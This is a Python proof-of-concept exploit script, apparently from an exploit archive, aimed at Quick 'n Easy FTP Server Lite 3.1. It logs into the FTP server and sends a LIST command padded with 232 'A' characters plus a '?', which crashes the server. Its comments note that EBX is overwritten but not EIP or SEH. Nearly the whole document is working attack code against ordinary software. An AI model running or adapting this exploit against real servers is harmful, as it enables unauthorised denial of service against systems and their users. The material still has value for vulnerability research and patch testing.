#!/usr/bin/python

print "\n############################################################"
print "##		 Team Hackers Garage			##"
print "##	Quick 'n Easy FTP Server Lite Version 3.1	##"
print "##		       Crash PoC			##"
print "##		 Sumit Sharma (aka b0nd)		##"
print "##		  sumit.iips@gmail.com			##"
print "##							##"
print "##	    Special Thanks to: Double_Zero		##"
print "##	(http://www.exploit-db.com/author/DouBle_Zer0)  ##"
print "##			   &				##"
print "##		corelanc0d3r (CORELAN TEAM)		##"
print "##							##"
print "############################################################"

# Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable 
# Tested on: Windows XP SP2
# ftp> ls AAAA... 232 A's...AAA?
# Server Crash!
# Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).
# No SEH overwrite
# No EIP overwrite


from socket import *

host = "172.12.128.4"		# Virtual Windows XP SP2
port = 21
user = "test"			# "upload" and "download" access
password = "test"


s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "LIST "
buffer += "A" * 232
buffer += "?"
buffer += "\r\n"

s.send(buffer)
print s.recv(1024)
s.close()
print "---->>> Server Crash!!!"